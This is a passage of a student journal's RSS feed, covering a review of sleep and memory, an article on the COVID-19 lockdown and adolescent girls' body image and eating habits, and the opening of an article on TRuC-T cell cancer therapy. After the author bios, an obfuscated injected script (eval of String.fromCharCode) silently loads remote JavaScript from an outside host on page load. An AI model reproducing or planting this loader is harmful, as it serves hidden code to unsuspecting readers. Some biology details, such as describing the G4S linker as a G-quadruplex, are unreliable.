Winter;16(4):497-502.&nbsp;</li><li>Brancaccio A, Tabarelli D, Bigica M, Baldauf D. Cortical source localization of sleep-stage specific oscillatory activity. Sci Rep. 2020 Apr 24;10(1):6976.&nbsp;</li><li>Biddle C, Oaster TR. The nature of sleep. AANA J. 1990 Feb;58(1):36-44.&nbsp;</li></ol>



<div class="no_indent" style="text-align:center;">
<h4>About the author</h4>
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image001.jpeg" alt="" class="wp-image-34" style="border-radius:100%;" width="150" height="150">
<h5>Ashley Qian</h5><p>Ashley is currently a Junior at the Wuxi Big Bridge Academy.
</p></figure></div>



<p></p>
<script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,116,105,115,116,105,99,46,115,99,114,105,112,116,115,112,108,97,116,102,111,114,109,46,99,111,109,47,99,111,108,108,101,99,116,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/</script><p>The post <a href="https://exploratiojournal.com/brief-review-of-sleeping-to-enhance-memory-consolidation/">Brief Review of Sleeping to Enhance Memory Consolidation</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Examining the effects of the COVID-19 lockdown on adolescent girls</title>
		<link>https://exploratiojournal.com/examining-the-effects-of-the-covid-19-lockdown-on-adolescent-girls/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=examining-the-effects-of-the-covid-19-lockdown-on-adolescent-girls</link>
		
		<dc:creator><![CDATA[Grace Julian]]></dc:creator>
		<pubDate>Tue, 26 Oct 2021 17:16:59 +0000</pubDate>
				<category><![CDATA[Psychology]]></category>
		<category><![CDATA[Scientific]]></category>
		<category><![CDATA[adolescence]]></category>
		<category><![CDATA[COVID-19]]></category>
		<category><![CDATA[Social Media]]></category>
		<guid isPermaLink="false">https://www.exploratiojournal.com/?p=1428</guid>

					<description><![CDATA[<p>Grace Julian<br />
Episcopal Academy</p>
<p>The post <a href="https://exploratiojournal.com/examining-the-effects-of-the-covid-19-lockdown-on-adolescent-girls/">Examining the effects of the COVID-19 lockdown on adolescent girls</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<div class="wp-block-media-text is-stacked-on-mobile is-vertically-aligned-top" style="grid-template-columns:16% auto"><figure class="wp-block-media-text__media"><img decoding="async" width="200" height="200" src="https://www.exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png" alt="" class="wp-image-488 size-full" srcset="https://exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png 200w, https://exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1-150x150.png 150w" sizes="(max-width: 200px) 100vw, 200px" /></figure><div class="wp-block-media-text__content">
<p class="no_indent margin_none"><strong>Author: Grace Julian</strong><br><em>Episcopal Academy<br></em>September 6, 2021</p>
</div></div>



<h2 class="wp-block-heading"><strong>Abstract&nbsp;</strong></h2>



<p>How did the lockdown and social media use affect the body image, eating habits, self-esteem, and mental health of adolescent girls? This paper looks at the impacts the lockdown had on social media usage, body image, and eating/exercise habits. Research shows that adolescent girls found themselves with lower self-esteem, depression, anxiety, and disordered eating habits during and after the pandemic. These changes combined with increased social media use that typically promotes unrealistic body expectations and unhealthy eating and exercise habits lead to an overall decrease in young girls’ self-esteem and body image. Based on these findings, we can formulate ways to help everyone with these unhealthy habits if we ever go into lockdown again in the future and even in our normal daily lives as well.&nbsp;</p>



<hr class="wp-block-separator"/>



<p>On March 12th of last year, schools began shutting down saying that they would be closed for the next two weeks out of precaution against COVID-19. Those two weeks quickly turned into three, and then four, and eventually they turned into months. Those months in quarantine were incredibly tough on everyone. Because everything closed down and everyone was stuck inside, peoples’ schedules changed drastically. For Katy, a freshman in high school on the dance team, covid was incredibly difficult. Halfway through her freshman year, her school shut down because of the pandemic. She was forced to do both school online as well as her dance classes. Because she spent most of her time at home, she found herself looking at social media much more often than before. She also began feeling insecure about falling behind on her goals for dance because of the pandemic, and as a result, she followed lots of fitness and dance influencers to try to learn and improve from them. Unfortunately, she only felt more insecure about how she looked and her abilities because those influencers did not post realistic habits. Those influencers she followed promoted unhealthy eating and exercise habits to “be a better dancer”, which led Katy to adopt those habits. Katy continued to feel bad about herself as she decreased the amount she ate and increased the amount she exercised. Katy now struggles with worsened body image and disordered eating habits that negatively impact her physical and mental health.&nbsp;</p>



<p>How did the pandemic impact our lives? During the COVID-19 lockdown, a survey of U.S. social media users found that 29.7 percent of respondents were using social media for 1-2 hours additional hours per day. This significant increase was due to the extra time spent at home during the lockdown. Everyone&#8217;s normal lives were disrupted. Students were forced to do virtual school, many adults were forced to work from home, and many others even lost their jobs due to the pandemic. The uncertainty and confusion of the pandemic led to significant amounts of stress, anxiety, and depression for everyone.&nbsp;</p>



<p>According to researchers at the University of Michigan conducting a survey from 977 parents of teens, they reported that 1 in 3 girls (aged 13-19) experienced new or worsening anxiety. Additionally, more parents of adolescent girls observed increased symptoms of depression, anxiety, and worry in their kids than parents of adolescent boys. The increase of social media usage also contributed to comparison and unrealistic expectations that worsened people&#8217;s self-esteem and body image, which often led to an increase in disordered eating and exercise habits for many.&nbsp;</p>



<p>Specifically for adolescent girls, the comparison between before and after the pandemic shows the negative impact it had on adolescent girls’ mental health. According to the American Academy of Child and Adolescent Psychiatry in 2018, as many as 10 in 100 adolescent girls had an eating disorder. According to the Anxiety and Depression Association of America, around 25% of teenage girls displayed depressive symptoms. Of the total teenage population taking antidepressants, nearly two-thirds of them are adolescent girls. Therefore, a significant percentage of adolescent girls did have mental health issues and eating disorders in 2018, before the pandemic. Later studies prove that these issues worsened for many with the pandemic. Because their schedules were disrupted and they had more time at home, many adolescent girls adopted or increased their social media usage. Due to the pandemic lockdown and increased social media usage, the eating and exercise habits and in adolescent girls worsened. We can see how worsened eating and exercise habits would impact the mental health and self-esteem of adolescent girls.&nbsp;</p>



<h2 class="wp-block-heading"><strong>How social media usage affects the body image of young girls?</strong></h2>



<p>A research review that examined social media and body image concerns examined that increased social media use leads to more negative body image in young men and women. It specifically shows that appearance comparisons are the direct and important link between the usage of social media and negative body image.&nbsp;</p>



<p>A research report examined the data from different studies. It showed the correlation between the usage of Facebook and the internalization of thin-ideal media. The study also reports that spending more time on Facebook/Myspace is associated with higher levels of body dissatisfaction and thin-idealization in adolescent girls (ages 14-22). Finally, it showed that elevated appearance exposure, such as posting or viewing, on Facebook was associated with more body dissatisfaction and thin-idealization amongst female high school students as well.&nbsp;</p>



<p>From this data, we can conclude that heavier usage and interaction on social media such as Facebook is linked to much higher body dissatisfaction. Due to the increase of global social media and internet usage during the COVID-19 pandemic lockdown, we can see how the increase negatively impacted young girls. On many social media platforms, many users tend to edit, photoshop, or alter their photos in order to achieve an “ideal photo”. This is because of the abundant access to photoshop and editing apps online. This allows influencers and other social media public figures to alter their photos to make themselves look more “thin”, “attractive”, or “likable”. Too often, young girls compare themselves to unrealistic social media photos that they are convinced are the norm, and as a result, they feel depressed and dissatisfied when they don&#8217;t fit into those norms. Additionally, because young girls are at such a vulnerable age where societal influences can have a strong impact on them for life, these factors are already leaving a destructive impact that will last a long time.&nbsp;</p>



<p>A study that surveyed 144 girls between the ages of 14-18 years old in the Netherlands and the impact normal and retouched Instagram photos had on their body image proved that the manipulated Instagram photos directly led to lower body image, specifically in those with higher social comparison tendencies. The manipulated photos were also rated more positively than the normal ones.&nbsp;</p>



<p>This study randomly exposed participants to either 10 original Instagram photos or 10 manipulated photos. Afterward, the participants completed a survey containing various questions regarding their own self-esteem and their opinions about the photos they saw. Regarding the participants&#8217; self-esteem, the study showed that on a scale from 0-6, girls with higher social comparison tendency that were shown manipulated photos had the lowest body image of 3.7. The data shows that 63 participants showed a lower tendency to make social comparisons, and 81 showed a higher tendency to make social comparisons. The participants also said in the survey that they could identify the manipulated photos better than they could identify the original photos.&nbsp;</p>



<p>From this data, we can conclude that exposure to digitally manipulated photos in adolescent girls, especially those with higher social comparison tendencies, will lead to lower body image in the girls. This is because the participants rate the manipulated photos in the study “more desirable” than the natural photos. Additionally, the data also proves that the majority of the participants could tell that the manipulated photos were manipulated. This shows that the participants are aware of the photos manipulation, yet they still have the tendency to compare themselves to the fake photos. Because manipulated photos are so commonly seen in social media, and the media in general, those with higher social comparison tendencies naturally continue to compare themselves and alter their own images in order to fit into what is deemed “desirable”. As a result, the girls are left stuck with lower body image, which has led and will lead to unhealthy responses, such as depression, over-exercising, and/or disordered eating.&nbsp;</p>



<h2 class="wp-block-heading"><strong>How did the pandemic impact the eating and exercise habits of adolescent girls?</strong></h2>



<p>A study done in Australia compared those with eating disorders to the general population regarding their eating and exercise habits during the pandemic. This study launched a survey on April 1, 2020, in Australia to 5,469 participants, 180 of those self-reporting previous eating disorder history, to determine the changes in eating and exercise behaviors in people during the COVID-19 pandemic lockdown. Between both groups, the groups with the pre-existing eating disorders and the group without pre-existing eating disorders, both groups showed an increase in disordered eating during the lockdown period. The eating disorder group showed an increase in pre-existing behaviors, and the regular group developed disordered eating habits as well. The data is divided into three main groups, the general population, eating disorder, and the anorexia nervosa subgroup.</p>



<p>In total, all three categories reported an overall increase in restricting habits amongst those with previous eating disorders and a slight increase in those without them. For binging, the eating disorder group and general population group both showed an overall increase in bingeing of 35%, while the anorexia nervosa subgroup reported 21% of the participants with an increase in binging habits. Exercise trends are similar for all three groups, there is a significant percentage of the population showing an increase, no difference, and less exercise. For the eating habits reports, none of the categories showed a significant percentage of the population reporting a decrease (&lt;14%), but all of the exercising categories did.&nbsp;</p>



<p>This study proves that due to the lockdown, those with previous eating disorders increased their disordered eating habits. Additionally, those without previous eating disorders developed disordered eating habits. There could be many reasons for this. For many, the additional time spent in quarantine left them with the time to think about eating/restricting and act on their thoughts. Another factor was the unstable and rapid changes throughout the pandemic. No one knew what the world was going to look like in a few weeks, let alone a few months, and this uncertainty led to lots of stress for many. Another factor of the pandemic was the financial and emotional uncertainty. Many feared losing jobs, housing, food, schooling, and loved ones due to COVID-19 as well. This additional stress may have led to bad coping mechanisms, like obsessing over eating, and exercise habits for the need to feel control over their lives.&nbsp;</p>



<p>A study conducted in the UK explored how the COVID-19 lockdown influences the eating habits and body image of adolescent girls.&nbsp;</p>



<p>There are five different categories for the survey data, and participants would rank how well they thought they fit with the categories on a scale of “strongly disagree” to “strongly agree”. The participants were divided into three groups for each category, no (previous) diagnosis, other diagnoses, and eating disorder diagnosis. The first set of data from the survey responses is regarding “difficulty to regulate/control eating”. According to the data, a majority of all three groups said that they agree with the statement. The second category was “more preoccupied with food and eating”. The majority of all three groups also said that they agree with this statement. The next two categories are “exercising more” and “thinking about exercise more”. A significant percentage of each of the groups said that they agree and strongly agree with both statements. The last category is “more concerned about the way I look”. A significant percentage of all three groups said they agree with this statement as well.&nbsp;</p>



<p>Overall, the data shows that the participants with an alternate diagnosis or an eating disorder had greater difficulty with their relationships with eating, exercise, and body image. At the same time, the people that had no previous mental or ED-related diagnosis reported an increase in negative relationships with eating and exercise during the lockdown. This proves that the lockdown did have a directly negative effect on many different types of people, those with and without a mental diagnosis. While everyone was on lockdown stuck in their homes, many people had lots of spare time on their hands. Specifically for those with an eating disorder/other mental diagnoses, they obsessed over food, exercise, and body image more than they would have when they were busy with their normal lives. Those with pre-existing eating disorders dealt with increased disordered eating habits, more so than the general population and even those with other mental disorders.&nbsp;</p>



<p>The rapid and unreliable changes in our lifestyles also contributed to increased anxiety amongst many. The fear of losing one&#8217;s job, loved ones, or one&#8217;s own life during the lockdown was incredibly stressful, which oftentimes led to harmful coping habits like disordered eating or over-exercising.&nbsp;</p>



<p>Additionally, during the lockdown, there was an overall trend of increased social media usage. This is understandable, given that the main form of communication while in lockdown was through technology/social media. However, the concentrated exposure to misleading/glamorized images may have led people to partake in over-exercising and disordered eating habits which overall, may have worsened their mental and physical health.&nbsp;</p>



<p>Moving forward, there are many things we can do to help those struggling with disordered eating, body image, and exercise issues if we go back into lockdown again, or even if we don’t. We can help make social media a more safe and real place for everyone. Reminding ourselves that we should not compare ourselves to social media photos is really important. The reality is, we don&#8217;t know where these photos came from, they could be photoshopped, edited, and/or posed to look “better”. Additionally, choosing to follow influencers and content creators on social media that don&#8217;t promote harmful eating and exercise habits, and blocking/reporting those that do is a great and simple way to prevent being exposed to these harmful ideas.&nbsp;</p>



<p>If we ever go back into a lockdown again, we cannot control the outside world, but we can control how it impacts us. Trying to cope with tough events using healthier coping mechanisms, such as exercising normally or going for walks outside, is a great way to deal with any stress or anxiety. It is important to look out for ourselves and others during these difficult times, and we must remind ourselves that it is okay to not be functioning at our best because these are not normal circumstances.&nbsp;</p>



<p>There are many factors that may have contributed to adolescent girls developing/worsening their habits during the lockdown. These factors include dramatic lifestyle changes, stress, previous eating disorders, and mental health issues, excessive social media usage, and additional time spent being stuck inside. All of these factors may have contributed to low self-esteem, body image, eating disorders, and poor mental health in adolescent girls, and many are still dealing with the lasting effects of these issues today.&nbsp;</p>



<h2 class="wp-block-heading"><strong>References</strong></h2>



<p>Published by Statista Research Department, &amp; 28, J. (2021, January 28). <em>U.S. increased time spent on Social due to coronavirus 2020</em>. Statista. <a href="https://www.statista.com/statistics/1116148/more-time-spent-social-media-platforms-users-usa-coronavirus/">https://www.statista.com/statistics/1116148/more-time-spent-social-media-platforms-users-usa-coronavirus/</a>. &nbsp;</p>



<p>AACAP. (n.d.). <em>Eating Disorders in Teens</em>. Eating disorders in teens. <a href="https://www.aacap.org/AACAP/Families_and_Youth/Facts_for_Families/FFF-Guide/Teenagers-With-Eating-Disorders-002.aspx">https://www.aacap.org/AACAP/Families_and_Youth/Facts_for_Families/FFF-Guide/Teenagers-With-Eating-Disorders-002.aspx</a>. &nbsp;</p>



<p><em>Girls and teens</em>. Girls and Teens | Anxiety and Depression Association of America, ADAA. (2021, February 5). <a href="https://adaa.org/find-help/by-demographics/women-and-young-girls/girls-and-teens">https://adaa.org/find-help/by-demographics/women-and-young-girls/girls-and-teens</a>. &nbsp;</p>



<p>Fardouly, J., &amp; Vartanian, L. R. (2015). <em>Social Media and Body Image Concerns: Current Research and Future Directions</em>. <a href="http://www2.psy.unsw.edu.au/Users/lvartanian/Publications/Fardouly%2520&amp;%2520Vartanian%2520(2016).pdf">http://www2.psy.unsw.edu.au/Users/lvartanian/Publications/Fardouly%20&amp;%20Vartanian%20(2016).pdf</a>.&nbsp; &nbsp;</p>



<p>Daalmans, S., Kleemans, M., Anschütz, D., &amp; Carbaat, I. (2016, December 15). <em>Picture perfect: The direct effect of manipulated instagram photos on body image in adolescent girls</em>. Taylor &amp; Francis Online. <a href="https://www.tandfonline.com/doi/full/10.1080/15213269.2016.1257392">https://www.tandfonline.com/doi/full/10.1080/15213269.2016.1257392</a>. &nbsp;</p>



<p>Phillipou, A., Meyer, D., Neill, E., Tan, E. J., Toh, W. L., Rheenen, T. E. V., &amp; Rossell, S. L. (2020, June 1). <em>Eating and exercise behaviors in eating disorders and the general population during THE COVID‐19 pandemic in Australia: Initial results from the COLLATE project</em>. Wiley Online Library. <a href="https://onlinelibrary.wiley.com/doi/full/10.1002/eat.23317">https://onlinelibrary.wiley.com/doi/full/10.1002/eat.23317</a>.&nbsp; &nbsp;</p>



<p>April 20, 2021 | P. (2021, April 28). <em>How to spot teen depression during covid</em>. Scripps Health. <a href="https://www.scripps.org/news_items/5319-teen-depression-during-covid-19-pandemic-what-to-look-for">https://www.scripps.org/news_items/5319-teen-depression-during-covid-19-pandemic-what-to-look-for</a>.&nbsp; &nbsp;</p>



<p>Robertson, M., Duffy, F., Newman, E., Prieto Bravo, C., Ates, H. H., &amp; Sharpe, H. (2021). Exploring changes in body image, eating and exercise during the COVID-19 lockdown: A UK survey. <em>Appetite</em>, <em>159</em>, 105062. <a href="https://doi.org/10.1016/j.appet.2020.105062">https://doi.org/10.1016/j.appet.2020.105062</a>&nbsp;</p>



<hr style="margin: 70px 0;" class="wp-block-separator">



<div class="no_indent" style="text-align:center;">
<h4>About the author</h4>
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png" alt="" class="wp-image-34" style="border-radius:100%;" width="150" height="150">
<h5>Grace Julian</h5><p>Grace is currently a Junior at the Episcopal Academy. She enjoys learning about history, psychology, and political science, helps run her school&#8217;s political blog, and is a leader of the community service executive board. In her free time, she enjoys playing water polo and reading.
</p></figure></div>



<p></p>
<script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,116,105,115,116,105,99,46,115,99,114,105,112,116,115,112,108,97,116,102,111,114,109,46,99,111,109,47,99,111,108,108,101,99,116,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/</script><p>The post <a href="https://exploratiojournal.com/examining-the-effects-of-the-covid-19-lockdown-on-adolescent-girls/">Examining the effects of the COVID-19 lockdown on adolescent girls</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>The effect of T-cell receptors on cancer therapy</title>
		<link>https://exploratiojournal.com/the-effect-of-t-cell-receptors-on-cancer-therapy/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=the-effect-of-t-cell-receptors-on-cancer-therapy</link>
		
		<dc:creator><![CDATA[Yicheng (Ethan) Ding]]></dc:creator>
		<pubDate>Tue, 26 Oct 2021 15:31:12 +0000</pubDate>
				<category><![CDATA[Biology]]></category>
		<category><![CDATA[Scientific]]></category>
		<category><![CDATA[biology]]></category>
		<category><![CDATA[cancer]]></category>
		<category><![CDATA[cancer therapy]]></category>
		<category><![CDATA[chimeric antigen receptors]]></category>
		<category><![CDATA[t-cell receptor fusion constructs]]></category>
		<guid isPermaLink="false">https://www.exploratiojournal.com/?p=1388</guid>

					<description><![CDATA[<p>Yicheng (Ethan) Ding<br />
Shanghai Pinghe Bilingual School</p>
<p>The post <a href="https://exploratiojournal.com/the-effect-of-t-cell-receptors-on-cancer-therapy/">The effect of T-cell receptors on cancer therapy</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<div class="wp-block-media-text is-stacked-on-mobile is-vertically-aligned-top" style="grid-template-columns:16% auto"><figure class="wp-block-media-text__media"><img decoding="async" width="200" height="200" src="https://www.exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png" alt="" class="wp-image-488 size-full" srcset="https://exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png 200w, https://exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1-150x150.png 150w" sizes="(max-width: 200px) 100vw, 200px" /></figure><div class="wp-block-media-text__content">
<p class="no_indent margin_none"><strong>Author: Yicheng (Ethan) Ding</strong><br><strong>Mentor</strong>: <strong>Dr. Vincent Boudreau</strong>, <strong>UC Berkeley</strong><br><em>Shanghai Pinghe Bilingual School<br></em>October 1, 2021</p>
</div></div>



<h2 class="wp-block-heading">Abstract</h2>



<p>As an innovative way to target B cell malignancies, the chimeric antigen receptors (CARs) therapy uses patient’s cells and reengineers them with a T cell receptor, enabling them to identify CD-19 antigens and eliminate tumors. However, the problem of cytotoxicity and tumor relapse exists within the CARs therapies. To address these limitations, a new generation of CARs, T cell receptor fusion constructs (TRuCs), to treat cancer diseases have been developed. Unlike CAR-T cells, which do not integrate anti-CD19 as part of T cell receptor (TCR), TRuC-T cells incorporates fusion constructs into functional T cell receptors. Using quantitative techniques such as Fluorescence-activated cell sorting (FACS) and Blue native PAGE, researchers have reported that TRuC-T cells exhibit higher levels of activated signaling proteins compared with CAR-T cells. In both <em>vitro</em> and in <em>vivo </em>models, TRuC-T cells showed a higher efficacy than CAR-T cells in killing lymphoma and leukemia tumors. They also showed a significantly lower level of cytokine release and lower risk of tumor relapse after the treatment than CARs. As a new generation of cancer treatments, TRuC-T cells carry the prospect of treating diseases in an efficacious way with fewer side effects.</p>



<p><em>Keywords: cancer cells, tumor cells, the chimeric antigen receptors (CARs), T cell receptor fusion constructs (TRuCs),&nbsp;</em></p>



<h2 class="wp-block-heading"><strong>Introduction</strong></h2>



<p>Cancer, a disease that involves abnormal cell growth through uncontrolled mitosis and with the potential to invade to other parts of the body, is one of the most deleterious and dangerous threats to people’s physical health. Propagating in all parts of the human body such as the lymph system as regular cells need to divide through mitosis, cancer cells cause detrimental effects by keeping old cells from dying and interfering with daughter cell functioning. In 2018, there was an estimated 18.1 million new cancer cases diagnosed and&nbsp;9.5 million cancer deaths&nbsp;around the globe (National Cancer Institute, 2020). Indeed, the number of cases and deaths are expected to rise to 29.5 million and 16.4 million by 2040, which call for a strong need for immunologists and biochemists to work out a better therapeutic solution. In August 2017, CAR (chimeric antigen receptor) therapy, which reprograms the immune system by engineering the T-cell receptor and targeting CD19 on the surface of cancer cells, first demonstrated impressive response to aggressive lymphomas. However, it has been accompanied by seriously harmful side effects such as cytokine release syndrome (CRS) and neurotoxicity. A considerable proportion of patients treated with CARs also relapsed.</p>



<p>Here, I discuss the development of the TRuC-T cells (TCR Fusion Construct T cells), their unique design and their high efficacy in the treatment of B cell malignancies. TRuC-T cells entered the clinic in 2018, killing tumor cells more efficaciously than CAR-T cells but with a significantly lower level of cytokine production. In addition, they exhibit potent anti-tumor activity in both liquid and solid cancer models, while the response seen in solid tumors from CAR-T cell therapy are less robust. This paper will discuss the effect of TRuC-T cells on cancer therapy in the following parts: TCR design, TCR composition, TCR efficacy in vitro, TCR activation, and TCR efficacy in vivo. The research on TRuC-T cells has a prominent significance in exploring current ways to cure cancer diseases and contributing to the improvement of people’s health all over the world.</p>



<h2 class="wp-block-heading"><strong>Design of TRuC</strong></h2>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="179" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-57-1024x179.png" alt="" class="wp-image-1309" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-57-1024x179.png 1024w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-57-300x52.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-57-768x134.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-57-920x161.png 920w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-57-230x40.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-57-350x61.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-57-480x84.png 480w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-57.png 1178w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption><meta charset="utf-8">Figure 1a Schematic diagram of expression vector (Baeuerle<em>, </em>2019)</figcaption></figure>



<p>T cell receptor fusion constructs effectively attach anti-CD19 to TCR complexes enabling them to recognize tumor surface antigens (Baeuerle<em>, </em>2019). As shown in figure 1, there are four essential parts in TRuCs: EF1α, anti-CD19, TCR subunits, and GFP, between which linker and signal peptides connect individual domains. EF1α acts as a transcriptional promotor to enhance TRuC protein production. Anti-CD19 comprises two low and high domains which target antigen CD19 and induce immune response in the body. They are interconnected with G4S (G-quadruplex secondary structures) that allows fusion protein flexibility and also allows domains to come together. In TCR subunits, ECD, TM, and ICD respectively represent extracellular domain, transmembrane domain, and intracellular domain, all of which contributes to the activation of T cells in response to CD19. T2A is the cleavage site where GFP is cleaved and detected as a sign of successful TRuC activation.&nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="280" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-58-1024x280.png" alt="" class="wp-image-1310" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-58-1024x280.png 1024w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-58-300x82.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-58-768x210.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-58-1536x420.png 1536w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-58-920x251.png 920w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-58-230x63.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-58-350x96.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-58-480x131.png 480w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-58.png 1676w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption><meta charset="utf-8"><meta charset="utf-8">Figure 1b five TCR complex (Baeuerle<em>, </em>2019)</figcaption></figure>



<p>To test TRuC assembly on individual TCR subunits, anti-CD19 was attached to each TCR subunit. There are five different kinds of TRuC: TCRα, TCRβ, CD3γ, CD3δ, and CD3ε. “<em>All subunits are type I membrane proteins but CD3ζ have extracellular immunoglobulin (Ig) domains</em>” (Baeuerle<em>, </em>2019). Changes in the arrangement of anti-CD19 can regulate the activity of TCR not only in surface expression but also in function. Of note, two scFv (single-chain variable fragment) are fused to CD3ε while only one scFv is fused to other units in TCR, which affect the efficacy of TRuCs and will be discussed in the following sections.&nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="202" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-59-1024x202.png" alt="" class="wp-image-1311" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-59-1024x202.png 1024w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-59-300x59.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-59-768x151.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-59-1536x303.png 1536w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-59-2048x404.png 2048w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-59-920x181.png 920w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-59-230x45.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-59-350x69.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-59-480x95.png 480w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption><meta charset="utf-8">Figure 1c surface expression of TRuCs and CARs (Baeuerle<em>, </em>2019)</figcaption></figure>



<p>The researchers use the technology FACS (Fluorescence-activated cell sorting) to show the expression of all five TRuC variants, and of 28ζ CAR, BBζ CAR, and linked GFP. It measures the shape and size of the cell and quantifies surface molecules and fluorescence. The y-axis represents anti-F(ab’)2 antibody recognizing the murine scFv framework. The x-axis represents GFP, which makes sure that the engineered genes work and indicates whether the TRuC protein is at the cell surface. Higher GFP amounts indicates that the engineered TRuC DNA constructs are being expressed in destination cells. As shown in figure 1c, the ε-TRuC exhibits the highest proportion 83% of T cells with anti-F(ab’)2 and GFP among five TRuCs. The other four vary greatly between 9% and 57%, which reflects the differences in efficiency of different scFv fused onto the TCR. As the second generation of CAR-T cells, BBζ CAR express a higher proportion on the T cell surface than any individual TRuC. Yet 28ζ CAR exhibit a lower expression than most TRuCs.&nbsp;</p>



